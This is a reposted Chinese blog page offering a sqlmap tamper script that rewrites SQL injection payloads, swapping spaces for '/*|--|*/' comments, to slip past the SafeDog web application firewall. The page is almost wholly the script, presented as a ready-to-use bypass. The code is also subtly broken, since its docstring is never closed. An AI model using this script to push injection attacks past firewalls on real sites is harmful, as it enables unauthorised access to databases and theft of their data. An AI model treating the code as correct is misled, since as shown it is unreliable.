sqlmap tamper绕过安全狗

最新推荐文章于 2023-10-18 23:26:58 发布

weixin_30294021

最新推荐文章于 2023-10-18 23:26:58 发布

阅读量1.6k

点赞数

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/dongchi/p/5079135.html

本文探讨了如何使用SQLMap的tamper功能修改payload，通过将空格替换为特定注释来绕过防火墙限制。适用于多种数据库环境，如Microsoft SQL Server、MySQL、Oracle和PostgreSQL等。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

可以过5.3版本放出py

#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/*|--|*/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/*|--|*/id/*|--|*/FROM/*|--|*/users'

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/*|--|*/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/*|--|*/"
                continue

            retVal += payload[i]

    return retVal


本文转自：http://www.silic.top/index.php/archives/6/

转载于:https://www.cnblogs.com/dongchi/p/5079135.html